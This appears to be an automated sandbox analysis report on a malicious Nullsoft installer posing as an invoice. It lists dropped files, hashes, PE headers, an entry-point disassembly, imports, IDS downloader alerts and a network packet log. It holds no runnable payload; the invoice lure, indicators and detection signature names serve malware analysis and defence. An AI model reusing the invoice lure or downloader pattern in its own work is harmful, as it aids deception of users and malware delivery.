                                                                                              Preview:..............................{...................................i<.....=..................................M......................N..............~........................................................................................................._..............n....]......k.....%................u...rU...........V........f..s............................. .X..........m....#.................................................................................{.................. .........................................D.............................Q).......................-.................................!...........S................................................B.....2................y............=.....................................................|#.........................................;........................................................................................B........................................................................................................
                                                                                              Process:C:\Users\user\Desktop\REVISED INVOICE.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):235766
                                                                                              Entropy (8bit):1.262950023618283
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:77uewIGU0VH/DujWmCpJ0oY03RZ2bp7Cb5j1AnvZwr2KbwXf+O3ThTnDrQXaUp+g:nu5Q4pn5ixn19nHIjHLyzaouVsP
                                                                                              MD5:535051A54B823E39736D2B2F2AEC56D4
                                                                                              SHA1:07507B4404013195F3A7262BBEB84AFB9FF73044
                                                                                              SHA-256:807FBB6EF44B4D318DBBA4AB3B4818E1000A2ABBEEC1A82EB6010A169C8F4541
                                                                                              SHA-512:23A36EACF7BE30F63ECCAC748F9E1AE7BFA1C3046FBC21DE229997C313AAC7E0CD2D50FAC15710B2542010511D9A7C192DA7EC722536421D032113C034E652D7
                                                                                              Malicious:false
                                                                                              Preview:.*....................................v..................................................................................7...p.....................................................................................................f.............#...............................................,w............................................O......Y..........................~................................................................................................................................................................0....................................................................S...........:.........................|...............................!...............................................}...................................4...............................*....................................j..........D............q................................................................L..........2....................~........................................................
                                                                                              Process:C:\Users\user\Desktop\REVISED INVOICE.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):429048
                                                                                              Entropy (8bit):1.2444109790439408
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:VgA+/Tb3OXWuT8THf/Ff+PaQ1LLI1xFOYUhd:w7b+mZlf+PaQ1c1xlO
                                                                                              MD5:8403F4E4069E57FA2AF93BB477EC2F5B
                                                                                              SHA1:F52F9A97B6FE053E998F33C8D7DFEBB858E30DB7
                                                                                              SHA-256:BE5DE0ACA1AC614A1F7EE90CB06C629778D368785317AF8531DBFFC946AC5D97
                                                                                              SHA-512:960AC24BF4A08D3659B2C0551826BCB4A54EF99CC1C879C15FFBB023112F54B867D31E901EC121DA0649019487ADC206B42BD28DE13A01306ABDCDD14A4EA39D
                                                                                              Malicious:false
                                                                                              Preview:..................@..............Q..............................2................................_............................................................................................................@..............W.........................}.............................................................j....C.....E.:....................................................K....{............s..................................................................................\...........................................................................................5..".\.......................q...................q..............................................................................e.....................K........................Y...................................................!........................b..................................C...............................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\REVISED INVOICE.exe
                                                                                              File Type:ASCII text, with very long lines (326), with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):508
                                                                                              Entropy (8bit):4.17807549360082
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:CXyC/gvlyY03AGDUA+VHowCpSm604erJA87vhBlyFenp6:CiC/6p03A087wBYSA8rhvywp6
                                                                                              MD5:7875B155DEAAF5AE952F60A1169B67A3
                                                                                              SHA1:09EB123FC93CDA5A858C436469D32B0E251789CE
                                                                                              SHA-256:AD0681420C18CF905F792608B5313422142D34A7984283D47FBE5AEBEE2FCD50
                                                                                              SHA-512:17DFF3F236ED9A5EF45D8C8008D6CC6F8AB080E272669CC5B23869D6CA6DFDB2E483DD517C6E479238CBE48C95BFF528ABC46896075A49E4249D908853BFC9AC
                                                                                              Malicious:false
                                                                                              Preview:fingerprint sparekassebestyrernes sumpfebers jorunns kinboot dynastier,tornls plne koordinerendes gripe berederiet recipientkvalitetsinteresser regionsplanretningslinjen griphite..beignetdejen vastiest indsluser scheherazade epostkasser acini waggery,nonperverted styringskredslb autumns.tumefaction bumbled tocalote vaporised fabriksassistenterne.liniedelinger receder stornelli regenereringernes redbreasts unoperatically unisys gennemsnitsfilters contuse downfallen unbigotedness cymaphytism raadfrslers..
                                                                                              Process:C:\Users\user\Desktop\REVISED INVOICE.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):324183
                                                                                              Entropy (8bit):1.255582183673372
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:iJxIWpDKZPWmn4EdlkbOKLvxy1xvacN7wSYpg5ZPifFQjkuIphGOod/NQfFFQgtO:9WpcQvAmccQNa2NgFnhRxMGFwvHILy
                                                                                              MD5:B36381C40D4A5D90C8B2E712830D6634
                                                                                              SHA1:20E8D57DC3B4F524727C115B48A176DBA40A24AA
                                                                                              SHA-256:FEB96AEF8BB072A8E8472A19508B424D04159389E1EA55DA73DA22C958100963
                                                                                              SHA-512:53E4AA268CD0D8F92D504920DDC7C9B67D8BA3A1D83779A0D6EF48E317D0A8E45434838A14B93D39E888032040A1671DC2D9B2CABB77B624D3048D1F6613DDEE
                                                                                              Malicious:false
                                                                                              Preview:...................................................qT.....................5.......................8................".....................................?.......t............................................d.............>.........................7.............................................................&........................................................................@.................3.......................................S.................................g...................................................z............................................................................'..............................................................................................w........;.................................................4............Y.......................S......................................m.......................................7......................r................................................E......................................................
                                                                                              Process:C:\Users\user\Desktop\REVISED INVOICE.exe
                                                                                              File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                                                              Category:dropped
                                                                                              Size (bytes):852
                                                                                              Entropy (8bit):3.1601931479458605
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:8wl0rYTXCG7GovHSLdqkNRN71Q1Nnv4fmNfBnlZ3YilMMEpxRljK:8cSU9MdqkNRN7q3dp3q
                                                                                              MD5:BFCEADD506F2A222716599DC14984F07
                                                                                              SHA1:341ED5B68587FA192D7A8B679BFD793B1BB6B24E
                                                                                              SHA-256:B0A11DD62395416C7955F41BDF83DE7EE533C2272FF86B2187A118393D71D7A6
                                                                                              SHA-512:3AE98F2E92F54D503115DE92118708F5647B93D2C3194DB4F6BA2C2158E7916C0D63282716AA50EFBC93B22CBD5B57D8F79970067308D4157FDD5B17097EA9EE
                                                                                              Malicious:false
                                                                                              Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................L.1...........Users.8..............*.........................U.s.e.r.s.....L.1...........user.8..............*.........................A.l.b.u.s.....R.1...........AppData.<..............*.........................A.p.p.D.a.t.a.....R.1...........Roaming.<..............*.........................R.o.a.m.i.n.g.....^.2...........seniors.tal.D..............*.........................s.e.n.i.o.r.s...t.a.l.............\.....\.....\.s.e.n.i.o.r.s...t.a.l.&.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.f.o.n.a.\.K.v.i.t.............i.............>.e.L.:..er.=i...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.................
                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                              Entropy (8bit):7.781042800324155
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:REVISED INVOICE.exe
                                                                                              File size:1'007'528 bytes
                                                                                              MD5:8274b1a41b53bf35e0b4330a20010d4c
                                                                                              SHA1:0b263f01dd3e10389cd4fe6575d114ea301ee874
                                                                                              SHA256:d2320e5704e90bc713c59a0521bacf04ca5751c2481e1dd4e3a95494981d867c
                                                                                              SHA512:727ed4fe93c9f0da19df61b81d3f92a9ddc9b6680b2ac841e1ed3ed37bbbe7ecc4a628dfddf31429d2fb5034edd6bc7f742a84f6e76fe7f7401dcd98ea3ec644
                                                                                              SSDEEP:12288:KBu+je2mGYUNpeqzfAOKUXWkP/8KYfNrnEoYhJLAMhuwIm/toWyqTnoXnPolxsq8:D+63cWqv3nANr8xAGuwIm/yWiopvC9wG
                                                                                              TLSH:47252238FFADD922D90557705923AC9DA8B1FC044E316A5FF4953B3E9B35283EA06306
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P...s...P...V...P..Rich.P..........................PE..L...s..V.................`...*.....
                                                                                              Icon Hash:1b3b392333ecec23
                                                                                              Entrypoint:0x40326a
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:true
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x567F8473 [Sun Dec 27 06:25:55 2015 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:d4b94e8ee3f620a89d114b9da4b31873
                                                                                              Signature Valid:false
                                                                                              Signature Issuer:CN=Radiotelegrafisten, O=Radiotelegrafisten, L=West Walton Highway, C=GB
                                                                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                              Error Number:-2146762487
                                                                                              Not Before, Not After
                                                                                              • 3/14/2024 2:57:36 AM 3/14/2027 1:57:36 AM
                                                                                              Subject Chain
                                                                                              • CN=Radiotelegrafisten, O=Radiotelegrafisten, L=West Walton Highway, C=GB
                                                                                              Version:3
                                                                                              Thumbprint MD5:A7FDED8126A27703124CB00AD7D44C1E
                                                                                              Thumbprint SHA-1:C2DD70F19E1ABB77FECEE1FB6BA8997217F1D380
                                                                                              Thumbprint SHA-256:CC277E658BE1406019F1040322B0CDAFC224592CEB8BF0A4EE37D3F1956E3DF9
                                                                                              Serial:3E78D97A91D31DD8E77DA75E18CC65EA13830FFF
                                                                                              Instruction
                                                                                              sub esp, 000002D4h
                                                                                              push ebp
                                                                                              push esi
                                                                                              push 00000020h
                                                                                              xor ebp, ebp
                                                                                              pop esi
                                                                                              mov dword ptr [esp+0Ch], ebp
                                                                                              push 00008001h
                                                                                              mov dword ptr [esp+0Ch], 00409300h
                                                                                              mov dword ptr [esp+18h], ebp
                                                                                              call dword ptr [004070B0h]
                                                                                              call dword ptr [004070ACh]
                                                                                              cmp ax, 00000006h
                                                                                              je 00007FDA4872B9F3h
                                                                                              push ebp
                                                                                              call 00007FDA4872EB36h
                                                                                              cmp eax, ebp
                                                                                              je 00007FDA4872B9E9h
                                                                                              push 00000C00h
                                                                                              call eax
                                                                                              push ebx
                                                                                              push edi
                                                                                              push 004092F4h
                                                                                              call 00007FDA4872EAB3h
                                                                                              push 004092ECh
                                                                                              call 00007FDA4872EAA9h
                                                                                              push 004092E0h
                                                                                              call 00007FDA4872EA9Fh
                                                                                              push 00000009h
                                                                                              call 00007FDA4872EB04h
                                                                                              push 00000007h
                                                                                              call 00007FDA4872EAFDh
                                                                                              mov dword ptr [00429224h], eax
                                                                                              call dword ptr [00407044h]
                                                                                              push ebp
                                                                                              call dword ptr [004072A8h]
                                                                                              mov dword ptr [004292D8h], eax
                                                                                              push ebp
                                                                                              lea eax, dword ptr [esp+34h]
                                                                                              push 000002B4h
                                                                                              push eax
                                                                                              push ebp
                                                                                              push 004206C8h
                                                                                              call dword ptr [0040718Ch]
                                                                                              push 004092C8h
                                                                                              push 00428220h
                                                                                              call 00007FDA4872E6EAh
                                                                                              call dword ptr [004070A8h]
                                                                                              mov ebx, 00434000h
                                                                                              push eax
                                                                                              push ebx
                                                                                              call 00007FDA4872E6D8h
                                                                                              push ebp
                                                                                              call dword ptr [00407178h]
                                                                                              Programming Language:
                                                                                              • [EXP] VC++ 6.0 SP5 build 8804
                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x74bc0xa0.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x660000x30200.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0xf56580x950
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x10000x5ffa0x6000df2f822ba33541e61d4a603b60bbdbccFalse0.6675211588541666data6.472885474718374IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rdata0x70000x13700x1400a10c5fabf76461b1b26713fde2284808False0.4404296875data5.0714431097950134IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .data0x90000x203180x60045bc104aba688d708375b6b0133d1563False0.5084635416666666data3.9955723529870646IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .ndata0x2a0000x3c0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .rsrc0x660000x302000x302004745466e1c17eaf1313ebf445a72f464False0.5377790178571429data6.135054497243622IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_BITMAP0x663d00x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                              RT_ICON0x667380x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.32464805394534485
                                                                                              RT_ICON0x76f600xd6c0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9934880675203726
                                                                                              RT_ICON0x846200x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.38577359680470885
                                                                                              RT_ICON0x8dac80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.3995040151157298
                                                                                              RT_ICON0x91cf00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.46213692946058094
                                                                                              RT_ICON0x942980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4383208255159475
                                                                                              RT_ICON0x953400x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6648936170212766
                                                                                              RT_DIALOG0x957a80x120dataEnglishUnited States0.53125
                                                                                              RT_DIALOG0x958c80x118dataEnglishUnited States0.5678571428571428
                                                                                              RT_DIALOG0x959e00x120dataEnglishUnited States0.5138888888888888
                                                                                              RT_DIALOG0x95b000xf8dataEnglishUnited States0.6330645161290323
                                                                                              RT_DIALOG0x95bf80xa0dataEnglishUnited States0.6125
                                                                                              RT_DIALOG0x95c980x60dataEnglishUnited States0.7291666666666666
                                                                                              RT_GROUP_ICON0x95cf80x68dataEnglishUnited States0.7596153846153846
                                                                                              RT_VERSION0x95d600x15cdataEnglishUnited States0.5804597701149425
                                                                                              RT_MANIFEST0x95ec00x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447
                                                                                              DLLImport
                                                                                              KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                              USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
                                                                                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                              SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                              ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                              COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                              ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                              EnglishUnited States
                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2024-10-24T12:03:03.413673+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.2249162142.250.186.142443TCP
                                                                                              2024-10-24T12:03:09.780235+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249164193.122.130.080TCP
                                                                                              2024-10-24T12:03:10.952320+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249164193.122.130.080TCP
                                                                                              2024-10-24T12:03:11.519251+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249166188.114.97.3443TCP
                                                                                              2024-10-24T12:03:12.849739+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249167132.226.8.16980TCP
                                                                                              2024-10-24T12:03:19.225896+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249174188.114.97.3443TCP
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Oct 24, 2024 12:03:01.957648993 CEST49162443192.168.2.22142.250.186.142
                                                                                              Oct 24, 2024 12:03:01.957670927 CEST44349162142.250.186.142192.168.2.22
                                                                                              Oct 24, 2024 12:03:01.958225965 CEST49162443192.168.2.22142.250.186.142
                                                                                              Oct 24, 2024 12:03:01.983844995 CEST49162443192.168.2.22142.250.186.142
                                                                                              Oct 24, 2024 12:03:01.983860970 CEST44349162142.250.186.142192.168.2.22
                                                                                              Oct 24, 2024 12:03:02.845546007 CEST44349162142.250.186.142192.168.2.22
                                                                                              Oct 24, 2024 12:03:02.846201897 CEST49162443192.168.2.22142.250.186.142
                                                                                              Oct 24, 2024 12:03:02.847119093 CEST44349162142.250.186.142192.168.2.22
                                                                                              Oct 24, 2024 12:03:02.847177982 CEST49162443192.168.2.22142.250.186.142
                                                                                              Oct 24, 2024 12:03:02.851982117 CEST49162443192.168.2.22142.250.186.142
                                                                                              Oct 24, 2024 12:03:02.852013111 CEST44349162142.250.186.142192.168.2.22
                                                                                              Oct 24, 2024 12:03:02.852598906 CEST44349162142.250.186.142192.168.2.22
                                                                                              Oct 24, 2024 12:03:02.852799892 CEST49162443192.168.2.22142.250.186.142
                                                                                              Oct 24, 2024 12:03:03.055546999 CEST49162443192.168.2.22142.250.186.142
                                                                                              Oct 24, 2024 12:03:03.103321075 CEST44349162142.250.186.142192.168.2.22
                                                                                              Oct 24, 2024 12:03:03.413703918 CEST44349162142.250.186.142192.168.2.22
                                                                                              Oct 24, 2024 12:03:03.413760900 CEST49162443192.168.2.22142.250.186.142
                                                                                              Oct 24, 2024 12:03:03.413789034 CEST44349162142.250.186.142192.168.2.22
                                                                                              Oct 24, 2024 12:03:03.413832903 CEST49162443192.168.2.22142.250.186.142
                                                                                              Oct 24, 2024 12:03:03.414148092 CEST49162443192.168.2.22142.250.186.142
                                                                                              Oct 24, 2024 12:03:03.414206982 CEST44349162142.250.186.142192.168.2.22
                                                                                              Oct 24, 2024 12:03:03.414262056 CEST49162443192.168.2.22142.250.186.142
                                                                                              Oct 24, 2024 12:03:03.457406044 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:03.457465887 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:03.457526922 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:03.458118916 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:03.458143950 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:04.315357924 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:04.315469980 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:04.322519064 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:04.322546005 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:04.323076963 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:04.324245930 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:04.380729914 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:04.423331022 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:06.827397108 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:06.827584982 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:06.835483074 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:06.835571051 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:06.944191933 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:06.944304943 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:06.944353104 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:06.944411993 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:06.944452047 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:06.944499969 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:06.944571972 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:06.944649935 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:06.946415901 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:06.946461916 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:06.946536064 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:06.946590900 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:06.952363968 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:06.952429056 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:06.952490091 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:06.952544928 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:06.961338043 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:06.961402893 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:06.961456060 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:06.961507082 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:07.295088053 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:07.295152903 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:07.295201063 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:07.295226097 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:07.295262098 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:07.295289040 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:07.295305967 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:07.295324087 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:07.295345068 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:07.295377016 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:07.295377016 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:07.295396090 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:07.295434952 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:07.295442104 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:07.295456886 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:07.295480967 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:07.295505047 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:07.295512915 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:07.295531034 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:07.295556068 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:07.295579910 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:07.295581102 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:07.295592070 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:07.295623064 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:07.295634985 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:07.295655966 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:07.295691967 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:07.295706034 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:07.295748949 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:07.295756102 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:07.295766115 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:07.295789003 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:07.295800924 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:07.295814991 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:07.295862913 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:07.295865059 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:07.295876026 CEST44349163142.250.186.97192.168.2.22
